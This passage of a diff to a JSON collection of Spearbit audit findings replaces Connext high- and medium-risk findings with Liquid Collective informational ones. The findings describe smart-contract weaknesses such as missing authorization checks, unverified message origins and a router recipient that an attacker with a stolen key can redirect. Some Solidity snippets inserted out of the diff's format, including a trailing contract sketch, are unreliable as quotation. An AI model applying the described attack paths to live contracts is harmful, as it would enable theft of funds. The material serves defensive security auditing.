exit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signalled to exit and are in the CL exit queue). That means the validatorCountToExit calculated to accommodate the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were signalled to exit in the previous reporting round but the operators have not registered them for exit in CL. Also totalStoppedValidatorCount can include slashed validator counts which again lowers the required validatorCountToExit, and those values should not be accounted for here. 
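A worked example of the undercount (hypothetical numbers; validatorCountToExit below is a standalone restatement of the LibUint256.ceil formula quoted in an earlier finding, with DEPOSIT_SIZE = 32 ether):

```solidity
uint256 constant DEPOSIT_SIZE = 32 ether;

// Standalone restatement of the quoted formula, for illustration only.
function validatorCountToExit(
    uint256 demand,
    uint256 available,
    uint256 exiting,
    uint256 preExiting
) pure returns (uint256) {
    uint256 uncovered = demand - (available + exiting + preExiting);
    return (uncovered + DEPOSIT_SIZE - 1) / DEPOSIT_SIZE; // ceil division
}

// If preExitingBalance double-counts the 3 validators already in exitingBalance:
// validatorCountToExit(320 ether, 0, 96 ether, 96 ether) == 4, whereas
// 7 exits (10 needed minus 3 actually exiting) would be required to cover
// the 320 ether redeem demand.
```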
Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Missing mirrorConnector check on Optimism hub connector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "processMessageFromRoot() calls _processMessage() to process messages for the \"fast\" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. 14 function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, \"!length\"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager }", + "title": "More documentation can be added regarding the currentMaxDailyCommittableAmount calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxDailyCommittableAmount is calculated as: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); We can add further to the comment: Since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represents the funds allocated for CL (funds that are already in CL, funds that are in transit to CL or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks, otherwise the upper bounds would be different.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Add _mirrorConnector to _sendMessage of BaseMultichain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right as the first parameter is the target contract to interact with according to multichain cross- chain. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... 
); }", + "title": "BalanceToRedeem is only non-zero during a report processing transaction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "BalanceToRedeem is only ever posses a non-zero value during the report processing when a quorum has been made for the oracle member votes (setConsensusLayerData). And at the very end of this process its value gets reset back to 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Unauthorized access to change acceptanceDelay", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The acceptanceDelay along with supportedInterfaces[] can be set by any user without the need of any Authorization once the init function of DiamondInit has been called and set. This is happening since caller checks (LibDiamond.enforceIsContractOwner();) are missing for these fields. Since acceptanceDelay defines the time post which certain action could be executed, setting a very large value could DOS the system (new owner cannot be set) and setting very low value could make changes without consid- eration time (Setting/Renounce Admin, Disable whitelisting etc at ProposedOwnableFacet.sol )", + "title": "Improve clarity on bufferRebalancingMode variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer to RedeemBuffer direction as can be seen here if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) { uint256 rebalancingAmount = LibUint256.min( availableBalanceToDeposit, redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem ); if (rebalancingAmount > 0) { availableBalanceToRedeem += rebalancingAmount; _setBalanceToRedeem(availableBalanceToRedeem); _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount); } } but it is not used at all when pulling funds in another way // if funds are left in the balance to redeem, we move them to the deposit balance _skimExcessBalanceToRedeem();", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Messages destined for ZkSync cannot be processed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) + layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync's hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync's spoke connector on ZkSync chain. Thus, any message destined for ZkSync chain cannot be processed since incoming messages cannot be proven without the latest aggregated Merkle root. 
16 function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, \"!length\"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure](https://v2-docs.zksync.io/d ,! ev/developer-guides/Bridging/l1-l2.html#structure) // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function ,! `l2TransactionBaseCost` c // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-proje ct](https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in- your-project) c c ,! ,! IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[]0 ); } Additionally, the ZkSync's hub connector contract needs to be loaded with ETH so that it can forward the appro- priate amount of ETH when calling the ZkSync's requestL2Transaction. However, it is not possible to do so because no receive(), fallback or payable function has been implemented within the contract and its parent contracts for accepting ETH.", + "title": "Fix code style consistency issues", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "There is a small code styling mismatch between the new code under audit and the style used through the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Cross-chain messaging via Multichain protocol will fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the Anycall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or destination chain when an anyCall is called. However, the anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work. 17 function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } Additionally, for the payment of the execution gas fee, a project can choose to implement either of the following methods: Pay on the source chain by depositing the gas fee to the caller contracts. Pay on the destination chain by depositing the gas fee to Multichain's anyCall contract at the destination chain. If Connext decides to pay the gas fee on the source chain, they would need to deposit some ETH to the connector contracts. 
However, it is not possible because no receive(), fallback or payable function has been implemented within the contracts and their parent contracts for accepting ETH.", + "title": "Remove unused constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "DENOMINATION_OFFSET is unused and can be removed from the codebase.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "_domainSeparatorV4() not updated after name/symbol change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The BridgeToken allows updating the name and symbol of a token. However the _CACHED_DOMAIN_- SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_- DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both and especially their combination can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol 18 function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, ,! address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import \"./EIP712.sol\"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } }", + "title": "Document what TotalRequestedExits can potentially represent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to be exited) and slashed validators for an operator. Also, in general, this is a rough quantity since we don't have a finer reporting of slashed and exited validators (they are reported as a sum).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "diamondCut() allows re-execution of old updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _- init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing diamondCut() function. 
Assume the following: diamondCut() function is executed to update the facet selector with version_2 A bug is found in ver- sion_2 and it is rolled back Owner can still execute diamondCut() function which will again update the facet selector to version 2 since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid", + "title": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked); Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "User may not be able to override slippage on destination", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), user won't be able to update slippage on the destination chain. In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage higher than necessary will result the swap trade being sandwiched.", + "title": "Oracle members would need to listen to ClearedReporting and report their data if necessary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Oracle members would need to listen to ClearedReporting event and report their data if necessary", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Do not rely on token balance to determine when cap is reached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to Connext Diamond to artificially increase the custodied amount since it depends on the token balance. 
This can be an expensive attack but it can become viable if price of a token (including next assets) drops.", + "title": "The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "If an oracle member has made a mistake in its CL report to the Oracle or for some other reason would like to change its report, it would not be able to due to the following if block: // we retrieve the voting status of the caller, and revert if already voted if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(report.epoch, msg.sender); } The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again. Related: Any oracle member can censor almost quorum report variants by resetting its address.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Router recipient can be configured more than once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comments from the setRouterRecipient function mentioned that the router should only be able to set the recipient once. Otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once. /** File: RoutersFacet.sol 394: 395: 396: 397: 398: 399: 400: 401: * @notice Sets the designated recipient for a router * @dev Router should only be able to set this once otherwise if router key compromised, * no problem is solved since attacker could just update recipient * @param router Router address to set recipient * @param recipient Recipient Address to set to router */ function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { Let's assume that during router setup, the setupRouter function is being called and the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentioned that the setRouterRecipient should only be set once, this is not true because this function will only revert if the _- prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (attacker), he could call the setRouterRecipient function to change the new recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by onlyRouterOwner modifier. Since Bob's has the compromised router's signing key, he will be able to pass this validation check. 21 /** File: RoutersFacet.sol 157: 158: 159: 160: 161: 162: 163: 164: 165: _; } * @notice Asserts caller is the router owner (if set) or the router itself */ modifier onlyRouterOwner(address _router) { address owner = s.routerPermissionInfo.routerOwners[_router]; if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender)) revert RoutersFacet__onlyRouterOwner_notRouterOwner(); The second validation is at Line 404, which checks if the new recipient is not the same as the previous recipient. 
The recipient variable is set to Bob's EOA wallet, while the _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is False, and it will not revert. So Bob successfully sets the recipient to his EOA at Line 407. File: RoutersFacet.sol 401-407: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { // Check recipient is changing address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); // Set new recipient s.routerPermissionInfo.routerRecipients[router] = recipient; Per the GitHub discussion, the motivation for such a design is the following: If a router's signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract. Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between router key and liquidity safety. With the current implementation, there is no security benefit of segregating the router owner role and recipient role unless the router owner has been burned (e.g. set to address zero). Because once the router's signing key is compromised, the attacker can change the recipient anyway. The security benefits of separation of concerns will only be achieved if the recipient can truly be set only once.", + "title": "For a quorum making a CL report, the epoch restrictions are checked twice.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch are checked once in reportConsensusLayerData: // checks that the report epoch is not invalid if (!river.isValidEpoch(report.epoch)) { revert InvalidEpoch(report.epoch); } and once again in setConsensusLayerData // we start by verifying that the reported epoch is valid based on the consensus layer spec if (!_isValidEpoch(cls, report.epoch)) { revert InvalidEpoch(report.epoch); } Note that only the Oracle can call the setConsensusLayerData endpoint and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "The set of tokens in an internal swap pool cannot be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the _pooledTokens or the set of tokens used in this stable swap pool cannot be updated. Now the s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and adopted asset or when a user provides liquidity or interacts with other external endpoints of StableSwapFacet.
If the set of tokens _pooledTokens submitted to this pool includes, besides the local and adopted token corresponding to _key, some other bad/malicious tokens, users' funds in the pool in question can be at risk. If this happens, we need to pause the protocol, push an update, and initializeSwap again.", + "title": "Clear report variants and report position data during the migration to the new contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Upon migration to the new contract with a new type of reporting data the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from: bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1) to: bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1)", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, - { - "title": "An incorrect decimal supplied to initializeSwap for a token cannot be corrected", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the decimal precisions per token, and therefore tokenPrecisionMultipliers, cannot be changed. If the supplied decimals also include a wrong value, it would cause incorrect calculations when a swap is made, and currently there is no update mechanism for tokenPrecisionMultipliers nor a mechanism for removing the swapStorages[_key].", + { + "title": "Remove unused functions from Oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The following functions are unused and can be removed from the Oracle's implementation isValidEpoch getTime getExpectedEpochId getLastCompletedEpochId getCurrentEpochId getCLSpec getCurrentFrame getFrameFirstEpochId getReportBounds", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Presence of delegate not enforced", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32, DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } }", + "title": "RedeemManager._claimRedeemRequests - Consider adding the recipient to the revert message in case of failure",
+ "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert. Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as the worst-case scenario only allows the transaction sender to specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Relayer could lose funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The xReceive function on the receiver side can contain unreliable code which the Relayer is unaware of. In the future, more relayers will participate in completing the transaction. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on the receiver side. 2. In the xReceive function, a call to a withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. If this foreign contract is checking tx.origin (say deposit/withdrawal were done via a third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer).", + "title": "Exit validator picking strategy does not consider slashed validators between reported epoch and current epoch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActiveOperators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed and so the strategy might pick and signal to the operators those validators that have been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed. Thus, some returned operators might not have exitable keys in the current epoch.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "TypedMemView.sameType does not use the correct right shift value to compare two bytes29s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function sameType should shift 2 x 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using the bytes29 type in bitwise operations and also comparisons to 0, a parameter of type bytes29 is zero-padded from the right so that it fits into a uint256 under the hood.
0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the XORed value 2 x 12 bytes, so the comparison compares the type flag and the 3 leading bytes of the memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase but can pose an important issue if incorporated into the project in the future. function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; }", + "title": "Duplicated functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The Operators.2._getStoppedValidatorCountAtIndex and OperatorsRegistry.1._getStoppedValidatorsCountFromRawArray functions are the same. File: Operators.2.sol 142-151: function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 index) internal view returns (uint32) { if (index + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[index + 1]; } File: OperatorsRegistry.1.sol 484-493: function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, uint256 operatorIndex) internal view returns (uint32) { if (operatorIndex + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[operatorIndex + 1]; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Incorrect formula for the scaled amplification coefficient in NatSpec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the context above, the scaled amplification coefficient a is described by the formula An(n - 1) where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be An^(n-1) and not An(n - 1), otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong. For the special case of n = 2, those values are actually equal: 2^(2-1) = 2 = 2 * 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens is more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A", + "title": "Funds might be pulled from CoverageFundV1 even when there has been no slashing incident.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, we still pull funds from the coverage funds contract to get closer to the upper bound limit: // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds
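// Review note (not part of the quoted source): nothing on this path checks whether a
// slashing incident was actually reported; availableAmountToUpperBound can be positive
// simply because the balance sits below the upper bound, so the branch below pulls
// coverage funds regardless.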
if (vars.availableAmountToUpperBound > 0) { // we pull the funds from the coverage recipient vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound); // we do not update the rewards as coverage is not considered rewards // we do not update the available amount as there are no more pulling actions to perform afterwards } So it is possible that the coverage funds get used even when there has been no slashing to account for.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "RootManager.propagate does not operate in a fail-safe manner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connector of all six chains (Arbitrum, Gnosis, Multichain, Optimism, Polygon, ZKSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and hub connector. The problem is that if one of the function calls to the chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figures out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase.", + "title": "Update inline documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": " OracleManager.1.sol functions highlighted in Context are missing the @return natspec. IOracle.1.sol#L204's highlighted comment is outdated. setMember can now also be called by the member itself. Also, there is a typo: adminitrator -> administrator. File: IOracle.1.sol 204, 209: /// @dev Only callable by the adminitrator @audit typo and outdated function setMember(address _oracleMember, address _newAddress) external; File: Oracle.1.sol 28-33, ..., 189: modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); } _; } function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) {", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Arborist once whitelisted cannot be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Arborist has the power to write over the Merkle root.
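A minimal sketch of the removal path the contract lacks (removeArborist, the whitelist mapping and the owner check are hypothetical names, not the codebase's API):

contract ArboristRegistry {
    address public owner;
    mapping(address => bool) public arborists;

    event ArboristRemoved(address indexed arborist);

    // allows revoking a compromised or misbehaving Arborist
    function removeArborist(address arborist) external {
        require(msg.sender == owner, "!owner");
        require(arborists[arborist], "!whitelisted");
        arborists[arborist] = false;
        emit ArboristRemoved(arborist);
    }
}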
